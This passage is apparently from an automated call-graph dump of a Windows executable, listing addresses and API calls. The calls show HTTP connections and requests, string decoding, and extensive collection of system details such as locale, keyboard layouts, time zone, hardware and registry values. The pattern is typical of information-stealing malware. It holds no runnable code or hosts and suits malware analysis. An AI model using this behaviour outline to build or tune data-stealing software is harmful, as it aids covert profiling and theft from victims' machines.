RtlAllocateHeap 14590->14591 14592 fc7628 wsprintfA 14591->14592 14593 fc7619 14591->14593 14595 fca740 lstrcpy 14592->14595 14594 fca740 lstrcpy 14593->14594 14596 fc5da7 14594->14596 14595->14596 14596->13660 14598 fca7a0 lstrcpy 14597->14598 14599 fb4899 14598->14599 15651 fb47b0 14599->15651 14601 fb48a5 14602 fca740 lstrcpy 14601->14602 14603 fb48d7 14602->14603 14604 fca740 lstrcpy 14603->14604 14605 fb48e4 14604->14605 14606 fca740 lstrcpy 14605->14606 14607 fb48f1 14606->14607 14608 fca740 lstrcpy 14607->14608 14609 fb48fe 14608->14609 14610 fca740 lstrcpy 14609->14610 14611 fb490b InternetOpenA StrCmpCA 14610->14611 14612 fb4944 14611->14612 14613 fb4ecb InternetCloseHandle 14612->14613 15657 fc8b60 14612->15657 14615 fb4ee8 14613->14615 15672 fb9ac0 CryptStringToBinaryA 14615->15672 14616 fb4963 15665 fca920 14616->15665 14619 fb4976 14621 fca8a0 lstrcpy 14619->14621 14627 fb497f 14621->14627 14622 fca820 2 API calls 14623 fb4f05 14622->14623 14624 fca9b0 4 API calls 14623->14624 14626 fb4f1b 14624->14626 14625 fb4f27 codecvt 14629 fca7a0 lstrcpy 14625->14629 14628 fca8a0 lstrcpy 14626->14628 14630 fca9b0 4 API calls 14627->14630 14628->14625 14642 fb4f57 14629->14642 14631 fb49a9 14630->14631 14632 fca8a0 lstrcpy 14631->14632 14633 fb49b2 14632->14633 14634 fca9b0 4 API calls 14633->14634 14635 fb49d1 14634->14635 14636 fca8a0 lstrcpy 14635->14636 14637 fb49da 14636->14637 14638 fca920 3 API calls 14637->14638 14639 fb49f8 14638->14639 14640 fca8a0 lstrcpy 14639->14640 14641 fb4a01 14640->14641 14643 fca9b0 4 API calls 14641->14643 14642->13663 14644 fb4a20 14643->14644 14645 fca8a0 lstrcpy 14644->14645 14646 fb4a29 14645->14646 14647 fca9b0 4 API calls 14646->14647 14648 fb4a48 14647->14648 14649 fca8a0 lstrcpy 14648->14649 14650 fb4a51 14649->14650 14651 fca9b0 4 API calls 14650->14651 14652 fb4a7d 14651->14652 14653 fca920 3 API calls 14652->14653 14654 fb4a84 14653->14654 14655 fca8a0 lstrcpy 14654->14655 14656 fb4a8d 14655->14656 14657 fb4aa3 InternetConnectA 14656->14657 14657->14613 14658 fb4ad3 HttpOpenRequestA 14657->14658 14660 fb4b28 14658->14660 14661 fb4ebe InternetCloseHandle 14658->14661 14662 fca9b0 4 API calls 14660->14662 14661->14613 14663 fb4b3c 14662->14663 14664 fca8a0 lstrcpy 14663->14664 14665 fb4b45 14664->14665 14666 fca920 3 API calls 14665->14666 14667 fb4b63 14666->14667 14668 fca8a0 lstrcpy 14667->14668 14669 fb4b6c 14668->14669 14670 fca9b0 4 API calls 14669->14670 14671 fb4b8b 14670->14671 14672 fca8a0 lstrcpy 14671->14672 14673 fb4b94 14672->14673 14674 fca9b0 4 API calls 14673->14674 14675 fb4bb5 14674->14675 14676 fca8a0 lstrcpy 14675->14676 14677 fb4bbe 14676->14677 14678 fca9b0 4 API calls 14677->14678 14679 fb4bde 14678->14679 14680 fca8a0 lstrcpy 14679->14680 14681 fb4be7 14680->14681 14682 fca9b0 4 API calls 14681->14682 14683 fb4c06 14682->14683 14684 fca8a0 lstrcpy 14683->14684 14685 fb4c0f 14684->14685 14686 fca920 3 API calls 14685->14686 14687 fb4c2d 14686->14687 14688 fca8a0 lstrcpy 14687->14688 14689 fb4c36 14688->14689 14690 fca9b0 4 API calls 14689->14690 14691 fb4c55 14690->14691 14692 fca8a0 lstrcpy 14691->14692 14693 fb4c5e 14692->14693 14694 fca9b0 4 API calls 14693->14694 14695 fb4c7d 14694->14695 14696 fca8a0 lstrcpy 14695->14696 14697 fb4c86 14696->14697 14698 fca920 3 API calls 14697->14698 14699 fb4ca4 14698->14699 14700 fca8a0 lstrcpy 14699->14700 14701 fb4cad 14700->14701 14702 fca9b0 4 API calls 14701->14702 14703 fb4ccc 14702->14703 14704 fca8a0 lstrcpy 14703->14704 14705 fb4cd5 14704->14705 14706 fca9b0 4 API calls 14705->14706 14707 fb4cf6 14706->14707 14708 fca8a0 lstrcpy 14707->14708 14709 fb4cff 14708->14709 14710 fca9b0 4 API calls 14709->14710 14711 fb4d1f 14710->14711 14712 fca8a0 lstrcpy 14711->14712 14713 fb4d28 14712->14713 14714 fca9b0 4 API calls 14713->14714 14715 fb4d47 14714->14715 14716 fca8a0 lstrcpy 14715->14716 14717 fb4d50 14716->14717 14718 fca920 3 API calls 14717->14718 14719 fb4d6e 14718->14719 14720 fca8a0 lstrcpy 14719->14720 14721 fb4d77 14720->14721 14722 fca740 lstrcpy 14721->14722 14723 fb4d92 14722->14723 14724 fca920 3 API calls 14723->14724 14725 fb4db3 14724->14725 14726 fca920 3 API calls 14725->14726 14727 fb4dba 14726->14727 14728 fca8a0 lstrcpy 14727->14728 14729 fb4dc6 14728->14729 14730 fb4de7 lstrlen 14729->14730 14731 fb4dfa 14730->14731 14732 fb4e03 lstrlen 14731->14732 15671 fcaad0 14732->15671 14734 fb4e13 HttpSendRequestA 14735 fb4e32 InternetReadFile 14734->14735 14736 fb4e67 InternetCloseHandle 14735->14736 14741 fb4e5e 14735->14741 14739 fca800 14736->14739 14738 fca9b0 4 API calls 14738->14741 14739->14661 14740 fca8a0 lstrcpy 14740->14741 14741->14735 14741->14736 14741->14738 14741->14740 15678 fcaad0 14742->15678 14744 fc17c4 StrCmpCA 14745 fc17cf ExitProcess 14744->14745 14746 fc17d7 14744->14746 14747 fc19c2 14746->14747 14748 fc185d StrCmpCA 14746->14748 14749 fc187f StrCmpCA 14746->14749 14750 fc1970 StrCmpCA 14746->14750 14751 fc18f1 StrCmpCA 14746->14751 14752 fc1951 StrCmpCA 14746->14752 14753 fc1932 StrCmpCA 14746->14753 14754 fc1913 StrCmpCA 14746->14754 14755 fc18ad StrCmpCA 14746->14755 14756 fc18cf StrCmpCA 14746->14756 14757 fca820 lstrlen lstrcpy 14746->14757 14747->13665 14748->14746 14749->14746 14750->14746 14751->14746 14752->14746 14753->14746 14754->14746 14755->14746 14756->14746 14757->14746 14759 fca7a0 lstrcpy 14758->14759 14760 fb5979 14759->14760 14761 fb47b0 2 API calls 14760->14761 14762 fb5985 14761->14762 14763 fca740 lstrcpy 14762->14763 14764 fb59ba 14763->14764 14765 fca740 lstrcpy 14764->14765 14766 fb59c7 14765->14766 14767 fca740 lstrcpy 14766->14767 14768 fb59d4 14767->14768 14769 fca740 lstrcpy 14768->14769 14770 fb59e1 14769->14770 14771 fca740 lstrcpy 14770->14771 14772 fb59ee InternetOpenA StrCmpCA 14771->14772 14773 fb5a1d 14772->14773 14774 fb5fc3 InternetCloseHandle 14773->14774 14775 fc8b60 3 API calls 14773->14775 14776 fb5fe0 14774->14776 14777 fb5a3c 14775->14777 14779 fb9ac0 4 API calls 14776->14779 14778 fca920 3 API calls 14777->14778 14780 fb5a4f 14778->14780 14781 fb5fe6 14779->14781 14782 fca8a0 lstrcpy 14780->14782 14783 fca820 2 API calls 14781->14783 14786 fb601f codecvt 14781->14786 14788 fb5a58 14782->14788 14784 fb5ffd 14783->14784 14785 fca9b0 4 API calls 14784->14785 14787 fb6013 14785->14787 14790 fca7a0 lstrcpy 14786->14790 14789 fca8a0 lstrcpy 14787->14789 14791 fca9b0 4 API calls 14788->14791 14789->14786 14799 fb604f 14790->14799 14792 fb5a82 14791->14792 14793 fca8a0 lstrcpy 14792->14793 14794 fb5a8b 14793->14794 14795 fca9b0 4 API calls 14794->14795 14796 fb5aaa 14795->14796 14797 fca8a0 lstrcpy 14796->14797 14798 fb5ab3 14797->14798 14800 fca920 3 API calls 14798->14800 14799->13671 14801 fb5ad1 14800->14801 14802 fca8a0 lstrcpy 14801->14802 14803 fb5ada 14802->14803 14804 fca9b0 4 API calls 14803->14804 14805 fb5af9 14804->14805 14806 fca8a0 lstrcpy 14805->14806 14807 fb5b02 14806->14807 14808 fca9b0 4 API calls 14807->14808 14809 fb5b21 14808->14809 14810 fca8a0 lstrcpy 14809->14810 14811 fb5b2a 14810->14811 14812 fca9b0 4 API calls 14811->14812 14813 fb5b56 14812->14813 14814 fca920 3 API calls 14813->14814 14815 fb5b5d 14814->14815 14816 fca8a0 lstrcpy 14815->14816 14817 fb5b66 14816->14817 14818 fb5b7c InternetConnectA 14817->14818 14818->14774 14819 fb5bac HttpOpenRequestA 14818->14819 14821 fb5c0b 14819->14821 14822 fb5fb6 InternetCloseHandle 14819->14822 14823 fca9b0 4 API calls 14821->14823 14822->14774 14824 fb5c1f 14823->14824 14825 fca8a0 lstrcpy 14824->14825 14826 fb5c28 14825->14826 14827 fca920 3 API calls 14826->14827 14828 fb5c46 14827->14828 14829 fca8a0 lstrcpy 14828->14829 14830 fb5c4f 14829->14830 14831 fca9b0 4 API calls 14830->14831 14832 fb5c6e 14831->14832 14833 fca8a0 lstrcpy 14832->14833 14834 fb5c77 14833->14834 14835 fca9b0 4 API calls 14834->14835 14836 fb5c98 14835->14836 14837 fca8a0 lstrcpy 14836->14837 14838 fb5ca1 14837->14838 14839 fca9b0 4 API calls 14838->14839 14840 fb5cc1 14839->14840 14841 fca8a0 lstrcpy 14840->14841 14842 fb5cca 14841->14842 14843 fca9b0 4 API calls 14842->14843 14844 fb5ce9 14843->14844 14845 fca8a0 lstrcpy 14844->14845 14846 fb5cf2 14845->14846 14847 fca920 3 API calls 14846->14847 14848 fb5d10 14847->14848 14849 fca8a0 lstrcpy 14848->14849 14850 fb5d19 14849->14850 14851 fca9b0 4 API calls 14850->14851 14852 fb5d38 14851->14852 14853 fca8a0 lstrcpy 14852->14853 14854 fb5d41 14853->14854 14855 fca9b0 4 API calls 14854->14855 14856 fb5d60 14855->14856 14857 fca8a0 lstrcpy 14856->14857 14858 fb5d69 14857->14858 14859 fca920 3 API calls 14858->14859 14860 fb5d87 14859->14860 14861 fca8a0 lstrcpy 14860->14861 14862 fb5d90 14861->14862 14863 fca9b0 4 API calls 14862->14863 14864 fb5daf 14863->14864 14865 fca8a0 lstrcpy 14864->14865 14866 fb5db8 14865->14866 14867 fca9b0 4 API calls 14866->14867 14868 fb5dd9 14867->14868 14869 fca8a0 lstrcpy 14868->14869 14870 fb5de2 14869->14870 14871 fca9b0 4 API calls 14870->14871 14872 fb5e02 14871->14872 14873 fca8a0 lstrcpy 14872->14873 14874 fb5e0b 14873->14874 14875 fca9b0 4 API calls 14874->14875 14876 fb5e2a 14875->14876 14877 fca8a0 lstrcpy 14876->14877 14878 fb5e33 14877->14878 14879 fca920 3 API calls 14878->14879 14880 fb5e54 14879->14880 14881 fca8a0 lstrcpy 14880->14881 14882 fb5e5d 14881->14882 14883 fb5e70 lstrlen 14882->14883 15679 fcaad0 14883->15679 14885 fb5e81 lstrlen GetProcessHeap RtlAllocateHeap 15680 fcaad0 14885->15680 14887 fb5eae lstrlen 14888 fb5ebe 14887->14888 14889 fb5ed7 lstrlen 14888->14889 14890 fb5ee7 14889->14890 14891 fb5ef0 lstrlen 14890->14891 14892 fb5f04 14891->14892 14893 fb5f1a lstrlen 14892->14893 15681 fcaad0 14893->15681 14895 fb5f2a HttpSendRequestA 14896 fb5f35 InternetReadFile 14895->14896 14897 fb5f6a InternetCloseHandle 14896->14897 14901 fb5f61 14896->14901 14897->14822 14899 fca9b0 4 API calls 14899->14901 14900 fca8a0 lstrcpy 14900->14901 14901->14896 14901->14897 14901->14899 14901->14900 14903 fc1077 14902->14903 14904 fc1151 14903->14904 14905 fca820 lstrlen lstrcpy 14903->14905 14904->13673 14905->14903 14907 fc0db7 14906->14907 14908 fc0f17 14907->14908 14909 fc0ea4 StrCmpCA 14907->14909 14910 fc0e27 StrCmpCA 14907->14910 14911 fc0e67 StrCmpCA 14907->14911 14912 fca820 lstrlen lstrcpy 14907->14912 14908->13681 14909->14907 14910->14907 14911->14907 14912->14907 14914 fc0f67 14913->14914 14915 fc0fb2 StrCmpCA 14914->14915 14916 fc1044 14914->14916 14917 fca820 lstrlen lstrcpy 14914->14917 14915->14914 14916->13689 14917->14914 14919 fca740 lstrcpy 14918->14919 14920 fc1a26 14919->14920 14921 fca9b0 4 API calls 14920->14921 14922 fc1a37 14921->14922 14923 fca8a0 lstrcpy 14922->14923 14924 fc1a40 14923->14924 14925 fca9b0 4 API calls 14924->14925 14926 fc1a5b 14925->14926 14927 fca8a0 lstrcpy 14926->14927 14928 fc1a64 14927->14928 14929 fca9b0 4 API calls 14928->14929 14930 fc1a7d 14929->14930 14931 fca8a0 lstrcpy 14930->14931 14932 fc1a86 14931->14932 14933 fca9b0 4 API calls 14932->14933 14934 fc1aa1 14933->14934 14935 fca8a0 lstrcpy 14934->14935 14936 fc1aaa 14935->14936 14937 fca9b0 4 API calls 14936->14937 14938 fc1ac3 14937->14938 14939 fca8a0 lstrcpy 14938->14939 14940 fc1acc 14939->14940 14941 fca9b0 4 API calls 14940->14941 14942 fc1ae7 14941->14942 14943 fca8a0 lstrcpy 14942->14943 14944 fc1af0 14943->14944 14945 fca9b0 4 API calls 14944->14945 14946 fc1b09 14945->14946 14947 fca8a0 lstrcpy 14946->14947 14948 fc1b12 14947->14948 14949 fca9b0 4 API calls 14948->14949 14950 fc1b2d 14949->14950 14951 fca8a0 lstrcpy 14950->14951 14952 fc1b36 14951->14952 14953 fca9b0 4 API calls 14952->14953 14954 fc1b4f 14953->14954 14955 fca8a0 lstrcpy 14954->14955 14956 fc1b58 14955->14956 14957 fca9b0 4 API calls 14956->14957 14958 fc1b76 14957->14958 14959 fca8a0 lstrcpy 14958->14959 14960 fc1b7f 14959->14960 14961 fc7500 6 API calls 14960->14961 14962 fc1b96 14961->14962 14963 fca920 3 API calls 14962->14963 14964 fc1ba9 14963->14964 14965 fca8a0 lstrcpy 14964->14965 14966 fc1bb2 14965->14966 14967 fca9b0 4 API calls 14966->14967 14968 fc1bdc 14967->14968 14969 fca8a0 lstrcpy 14968->14969 14970 fc1be5 14969->14970 14971 fca9b0 4 API calls 14970->14971 14972 fc1c05 14971->14972 14973 fca8a0 lstrcpy 14972->14973 14974 fc1c0e 14973->14974 15682 fc7690 GetProcessHeap RtlAllocateHeap 14974->15682 14977 fca9b0 4 API calls 14978 fc1c2e 14977->14978 14979 fca8a0 lstrcpy 14978->14979 14980 fc1c37 14979->14980 14981 fca9b0 4 API calls 14980->14981 14982 fc1c56 14981->14982 14983 fca8a0 lstrcpy 14982->14983 14984 fc1c5f 14983->14984 14985 fca9b0 4 API calls 14984->14985 14986 fc1c80 14985->14986 14987 fca8a0 lstrcpy 14986->14987 14988 fc1c89 14987->14988 15689 fc77c0 GetCurrentProcess IsWow64Process 14988->15689 14991 fca9b0 4 API calls 14992 fc1ca9 14991->14992 14993 fca8a0 lstrcpy 14992->14993 14994 fc1cb2 14993->14994 14995 fca9b0 4 API calls 14994->14995 14996 fc1cd1 14995->14996 14997 fca8a0 lstrcpy 14996->14997 14998 fc1cda 14997->14998 14999 fca9b0 4 API calls 14998->14999 15000 fc1cfb 14999->15000 15001 fca8a0 lstrcpy 15000->15001 15002 fc1d04 15001->15002 15003 fc7850 3 API calls 15002->15003 15004 fc1d14 15003->15004 15005 fca9b0 4 API calls 15004->15005 15006 fc1d24 15005->15006 15007 fca8a0 lstrcpy 15006->15007 15008 fc1d2d 15007->15008 15009 fca9b0 4 API calls 15008->15009 15010 fc1d4c 15009->15010 15011 fca8a0 lstrcpy 15010->15011 15012 fc1d55 15011->15012 15013 fca9b0 4 API calls 15012->15013 15014 fc1d75 15013->15014 15015 fca8a0 lstrcpy 15014->15015 15016 fc1d7e 15015->15016 15017 fc78e0 3 API calls 15016->15017 15018 fc1d8e 15017->15018 15019 fca9b0 4 API calls 15018->15019 15020 fc1d9e 15019->15020 15021 fca8a0 lstrcpy 15020->15021 15022 fc1da7 15021->15022 15023 fca9b0 4 API calls 15022->15023 15024 fc1dc6 15023->15024 15025 fca8a0 lstrcpy 15024->15025 15026 fc1dcf 15025->15026 15027 fca9b0 4 API calls 15026->15027 15028 fc1df0 15027->15028 15029 fca8a0 lstrcpy 15028->15029 15030 fc1df9 15029->15030 15691 fc7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15030->15691 15033 fca9b0 4 API calls 15034 fc1e19 15033->15034 15035 fca8a0 lstrcpy 15034->15035 15036 fc1e22 15035->15036 15037 fca9b0 4 API calls 15036->15037 15038 fc1e41 15037->15038 15039 fca8a0 lstrcpy 15038->15039 15040 fc1e4a 15039->15040 15041 fca9b0 4 API calls 15040->15041 15042 fc1e6b 15041->15042 15043 fca8a0 lstrcpy 15042->15043 15044 fc1e74 15043->15044 15693 fc7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15044->15693 15047 fca9b0 4 API calls 15048 fc1e94 15047->15048 15049 fca8a0 lstrcpy 15048->15049 15050 fc1e9d 15049->15050 15051 fca9b0 4 API calls 15050->15051 15052 fc1ebc 15051->15052 15053 fca8a0 lstrcpy 15052->15053 15054 fc1ec5 15053->15054 15055 fca9b0 4 API calls 15054->15055 15056 fc1ee5 15055->15056 15057 fca8a0 lstrcpy 15056->15057 15058 fc1eee 15057->15058 15696 fc7b00 GetUserDefaultLocaleName 15058->15696 15061 fca9b0 4 API calls 15062 fc1f0e 15061->15062 15063 fca8a0 lstrcpy 15062->15063 15064 fc1f17 15063->15064 15065 fca9b0 4 API calls 15064->15065 15066 fc1f36 15065->15066 15067 fca8a0 lstrcpy 15066->15067 15068 fc1f3f 15067->15068 15069 fca9b0 4 API calls 15068->15069 15070 fc1f60 15069->15070 15071 fca8a0 lstrcpy 15070->15071 15072 fc1f69 15071->15072 15700 fc7b90 15072->15700 15074 fc1f80 15075 fca920 3 API calls 15074->15075 15076 fc1f93 15075->15076 15077 fca8a0 lstrcpy 15076->15077 15078 fc1f9c 15077->15078 15079 fca9b0 4 API calls 15078->15079 15080 fc1fc6 15079->15080 15081 fca8a0 lstrcpy 15080->15081 15082 fc1fcf 15081->15082 15083 fca9b0 4 API calls 15082->15083 15084 fc1fef 15083->15084 15085 fca8a0 lstrcpy 15084->15085 15086 fc1ff8 15085->15086 15712 fc7d80 GetSystemPowerStatus 15086->15712 15089 fca9b0 4 API calls 15090 fc2018 15089->15090 15091 fca8a0 lstrcpy 15090->15091 15092 fc2021 15091->15092 15093 fca9b0 4 API calls 15092->15093 15094 fc2040 15093->15094 15095 fca8a0 lstrcpy 15094->15095 15096 fc2049 15095->15096 15097 fca9b0 4 API calls 15096->15097 15098 fc206a 15097->15098 15099 fca8a0 lstrcpy 15098->15099 15100 fc2073 15099->15100 15101 fc207e GetCurrentProcessId 15100->15101 15714 fc9470 OpenProcess 15101->15714 15104 fca920 3 API calls 15105 fc20a4 15104->15105 15106 fca8a0 lstrcpy 15105->15106 15107 fc20ad 15106->15107 15108 fca9b0 4 API calls 15107->15108 15109 fc20d7 15108->15109 15110 fca8a0 lstrcpy 15109->15110 15111 fc20e0 15110->15111 15112 fca9b0 4 API calls 15111->15112 15113 fc2100 15112->15113 15114 fca8a0 lstrcpy 15113->15114 15115 fc2109 15114->15115 15719 fc7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15115->15719 15118 fca9b0 4 API calls 15119 fc2129 15118->15119 15120 fca8a0 lstrcpy 15119->15120 15121 fc2132 15120->15121 15122 fca9b0 4 API calls 15121->15122 15123 fc2151 15122->15123 15124 fca8a0 lstrcpy 15123->15124 15125 fc215a 15124->15125 15126 fca9b0 4 API calls 15125->15126 15127 fc217b 15126->15127 15128 fca8a0 lstrcpy 15127->15128 15129 fc2184 15128->15129 15723 fc7f60 15129->15723 15132 fca9b0 4 API calls 15133 fc21a4 15132->15133 15134 fca8a0 lstrcpy 15133->15134 15135 fc21ad 15134->15135 15136 fca9b0 4 API calls 15135->15136 15137 fc21cc 15136->15137 15138 fca8a0 lstrcpy 15137->15138 15139 fc21d5 15138->15139 15140 fca9b0 4 API calls 15139->15140 15141 fc21f6 15140->15141 15142 fca8a0 lstrcpy 15141->15142 15143 fc21ff 15142->15143 15736 fc7ed0 GetSystemInfo wsprintfA 15143->15736 15146 fca9b0 4 API calls 15147 fc221f 15146->15147 15148 fca8a0 lstrcpy 15147->15148 15149 fc2228 15148->15149 15150 fca9b0 4 API calls 15149->15150 15151 fc2247 15150->15151 15152 fca8a0 lstrcpy 15151->15152 15153 fc2250 15152->15153 15154 fca9b0 4 API calls 15153->15154 15155 fc2270 15154->15155 15156 fca8a0 lstrcpy 15155->15156 15157 fc2279 15156->15157 15738 fc8100 GetProcessHeap RtlAllocateHeap 15157->15738 15160 fca9b0 4 API calls 15161 fc2299 15160->15161 15162 fca8a0 lstrcpy 15161->15162 15163 fc22a2 15162->15163 15164 fca9b0 4 API calls 15163->15164 15165 fc22c1 15164->15165 15166 fca8a0 lstrcpy 15165->15166 15167 fc22ca 15166->15167 15168 fca9b0 4 API calls 15167->15168 15169 fc22eb 15168->15169 15170 fca8a0 lstrcpy 15169->15170 15171 fc22f4 15170->15171 15744 fc87c0 15171->15744 15174 fca920 3 API calls 15175 fc231e 15174->15175 15176 fca8a0 lstrcpy 15175->15176 15177 fc2327 15176->15177 15178 fca9b0 4 API calls 15177->15178 15179 fc2351 15178->15179 15180 fca8a0 lstrcpy 15179->15180 15181 fc235a 15180->15181 15182 fca9b0 4 API calls 15181->15182 15183 fc237a 15182->15183 15184 fca8a0 lstrcpy 15183->15184 15185 fc2383 15184->15185 15186 fca9b0 4 API calls 15185->15186 15187 fc23a2 15186->15187 15188 fca8a0 lstrcpy 15187->15188 15189 fc23ab 15188->15189 15749 fc81f0 15189->15749 15191 fc23c2 15192 fca920 3 API calls 15191->15192 15193 fc23d5 15192->15193 15194 fca8a0 lstrcpy 15193->15194 15195 fc23de 15194->15195 15196 fca9b0 4 API calls 15195->15196 15197 fc240a 15196->15197 15198 fca8a0 lstrcpy 15197->15198 15199 fc2413 15198->15199 15200 fca9b0 4 API calls 15199->15200 15201 fc2432 15200->15201 15202 fca8a0 lstrcpy 15201->15202 15203 fc243b 15202->15203 15204 fca9b0 4 API calls 15203->15204 15205 fc245c 15204->15205 15206 fca8a0 lstrcpy 15205->15206 15207 fc2465 15206->15207 15208 fca9b0 4 API calls 15207->15208 15209 fc2484 15208->15209 15210 fca8a0 lstrcpy 15209->15210 15211 fc248d 15210->15211 15212 fca9b0 4 API calls 15211->15212 15213 fc24ae 15212->15213 15214 fca8a0 lstrcpy 15213->15214 15215 fc24b7 15214->15215 15757 fc8320 15215->15757 15217 fc24d3 15218 fca920 3 API calls 15217->15218 15219 fc24e6 15218->15219 15220 fca8a0 lstrcpy 15219->15220 15221 fc24ef 15220->15221 15222 fca9b0 4 API calls 15221->15222 15223 fc2519 15222->15223 15224 fca8a0 lstrcpy 15223->15224 15225 fc2522 15224->15225 15226 fca9b0 4 API calls 15225->15226 15227 fc2543 15226->15227 15228 fca8a0 lstrcpy 15227->15228 15229 fc254c 15228->15229 15230 fc8320 17 API calls 15229->15230 15231 fc2568 15230->15231 15232 fca920 3 API calls 15231->15232 15233 fc257b 15232->15233 15234 fca8a0 lstrcpy 15233->15234 15235 fc2584 15234->15235 15236 fca9b0 4 API calls 15235->15236 15237 fc25ae 15236->15237 15238 fca8a0 lstrcpy 15237->15238 15239 fc25b7 15238->15239 15240 fca9b0 4 API calls 15239->15240 15241 fc25d6 15240->15241 15242 fca8a0 lstrcpy 15241->15242 15243 fc25df 15242->15243 15244 fca9b0 4 API calls 15243->15244 15245 fc2600 15244->15245 15246 fca8a0 lstrcpy 15245->15246 15247 fc2609 15246->15247 15793 fc8680 15247->15793 15249 fc2620 15250 fca920 3 API calls 15249->15250 15251 fc2633 15250->15251 15252 fca8a0 lstrcpy 15251->15252 15253 fc263c 15252->15253 15254 fc265a lstrlen 15253->15254 15255 fc266a 15254->15255 15256 fca740 lstrcpy 15255->15256 15257 fc267c 15256->15257 15258 fb1590 lstrcpy 15257->15258 15259 fc268d 15258->15259 15803 fc5190 15259->15803 15261 fc2699 15261->13693 15991 fcaad0 15262->15991 15264 fb5009 InternetOpenUrlA 15268 fb5021 15264->15268 15265 fb502a InternetReadFile 15265->15268 15266 fb50a0 InternetCloseHandle InternetCloseHandle 15267 fb50ec 15266->15267 15267->13697 15268->15265 15268->15266 15992 fb98d0 15269->15992 15271 fc0759 15272 fc077d 15271->15272 15273 fc0a38 15271->15273 15276 fc0799 StrCmpCA 15272->15276 15274 fb1590 lstrcpy 15273->15274 15275 fc0a49 15274->15275 16168 fc0250 15275->16168 15278 fc07a8 15276->15278 15304 fc0843 15276->15304 15279 fca7a0 lstrcpy 15278->15279 15281 fc07c3 15279->15281 15280 fc0865 StrCmpCA 15282 fc0874 15280->15282 15321 fc096b 15280->15321 15284 fb1590 lstrcpy 15281->15284 15285 fca740 lstrcpy 15282->15285 15286 fc080c 15284->15286 15289 fc0881 15285->15289 15287 fca7a0 lstrcpy 15286->15287 15290 fc0823 15287->15290 15288 fc099c StrCmpCA 15291 fc09ab 15288->15291 15292 fc0a2d 15288->15292 15293 fca9b0 4 API calls 15289->15293 15294 fca7a0 lstrcpy 15290->15294 15295 fb1590 lstrcpy 15291->15295 15292->13701 15296 fc08ac 15293->15296 15297 fc083e 15294->15297 15298 fc09f4 15295->15298 15299 fca920 3 API calls 15296->15299 15995 fbfb00 15297->15995 15301 fca7a0 lstrcpy 15298->15301 15302 fc08b3 15299->15302 15305 fc0a0d 15301->15305 15303 fca9b0 4 API calls 15302->15303 15306 fc08ba 15303->15306 15304->15280 15307 fca7a0 lstrcpy 15305->15307 15309 fca8a0 lstrcpy 15306->15309 15308 fc0a28 15307->15308 15321->15288 15643 fca7a0 lstrcpy 15642->15643 15644 fb1683 15643->15644 15645 fca7a0 lstrcpy 15644->15645 15646 fb1695 15645->15646 15647 fca7a0 lstrcpy 15646->15647 15648 fb16a7 15647->15648 15649 fca7a0 lstrcpy 15648->15649 15650 fb15a3 15649->15650 15650->14524 15652 fb47c6 15651->15652 15653 fb4838 lstrlen 15652->15653 15677 fcaad0 15653->15677 15655 fb4848 InternetCrackUrlA 15656 fb4867 15655->15656 15656->14601 15658 fca740 lstrcpy 15657->15658 15659 fc8b74 15658->15659 15660 fca740 lstrcpy 15659->15660 15661 fc8b82 GetSystemTime 15660->15661 15662 fc8b99 15661->15662 15663 fca7a0 lstrcpy 15662->15663 15664 fc8bfc 15663->15664 15664->14616 15666 fca931 15665->15666 15667 fca988 15666->15667 15669 fca968 lstrcpy lstrcat 15666->15669 15668 fca7a0 lstrcpy 15667->15668 15670 fca994 15668->15670 15669->15667 15670->14619 15671->14734 15673 fb4eee 15672->15673 15674 fb9af9 LocalAlloc 15672->15674 15673->14622 15673->14625 15674->15673 15675 fb9b14 CryptStringToBinaryA 15674->15675 15675->15673 15676 fb9b39 LocalFree 15675->15676 15676->15673 15677->15655 15678->14744 15679->14885 15680->14887 15681->14895 15810 fc77a0 15682->15810 15685 fc1c1e 15685->14977 15686 fc76c6 RegOpenKeyExA 15687 fc7704 RegCloseKey 15686->15687 15688 fc76e7 RegQueryValueExA 15686->15688 15687->15685 15688->15687 15690 fc1c99 15689->15690 15690->14991 15692 fc1e09 15691->15692 15692->15033 15694 fc7a9a wsprintfA 15693->15694 15695 fc1e84 15693->15695 15694->15695 15695->15047 15697 fc7b4d 15696->15697 15699 fc1efe 15696->15699 15817 fc8d20 LocalAlloc CharToOemW 15697->15817 15699->15061 15701 fca740 lstrcpy 15700->15701 15702 fc7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15701->15702 15711 fc7c25 15702->15711 15703 fc7d18 15705 fc7d1e LocalFree 15703->15705 15706 fc7d28 15703->15706 15704 fc7c46 GetLocaleInfoA 15704->15711 15705->15706 15707 fca7a0 lstrcpy 15706->15707 15710 fc7d37 15707->15710 15708 fca8a0 lstrcpy 15708->15711 15709 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15709->15711 15710->15074 15711->15703 15711->15704 15711->15708 15711->15709 15713 fc2008 15712->15713 15713->15089 15715 fc94b5 15714->15715 15716 fc9493 GetModuleFileNameExA CloseHandle 15714->15716 15717 fca740 lstrcpy 15715->15717 15716->15715 15718 fc2091 15717->15718 15718->15104 15720 fc7e68 RegQueryValueExA 15719->15720 15721 fc2119 15719->15721 15722 fc7e8e RegCloseKey 15720->15722 15721->15118 15722->15721 15724 fc7fb9 GetLogicalProcessorInformationEx 15723->15724 15725 fc7fd8 GetLastError 15724->15725 15730 fc8029 15724->15730 15726 fc8022 15725->15726 15735 fc7fe3 15725->15735 15728 fc2194 15726->15728 15732 fc89f0 2 API calls 15726->15732 15728->15132 15731 fc89f0 2 API calls 15730->15731 15733 fc807b 15731->15733 15732->15728 15733->15726 15734 fc8084 wsprintfA 15733->15734 15734->15728 15735->15724 15735->15728 15818 fc89f0 15735->15818 15821 fc8a10 GetProcessHeap RtlAllocateHeap 15735->15821 15737 fc220f 15736->15737 15737->15146 15739 fc89b0 15738->15739 15740 fc814d GlobalMemoryStatusEx 15739->15740 15741 fc8163 __aulldiv 15740->15741 15742 fc819b wsprintfA 15741->15742 15743 fc2289 15742->15743 15743->15160 15745 fc87fb GetProcessHeap RtlAllocateHeap wsprintfA 15744->15745 15747 fca740 lstrcpy 15745->15747 15748 fc230b 15747->15748 15748->15174 15750 fca740 lstrcpy 15749->15750 15751 fc8229 15750->15751 15752 fc8263 15751->15752 15755 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15751->15755 15756 fca8a0 lstrcpy 15751->15756 15753 fca7a0 lstrcpy 15752->15753 15754 fc82dc 15753->15754 15754->15191 15755->15751 15756->15751 15758 fca740 lstrcpy 15757->15758 15759 fc835c RegOpenKeyExA 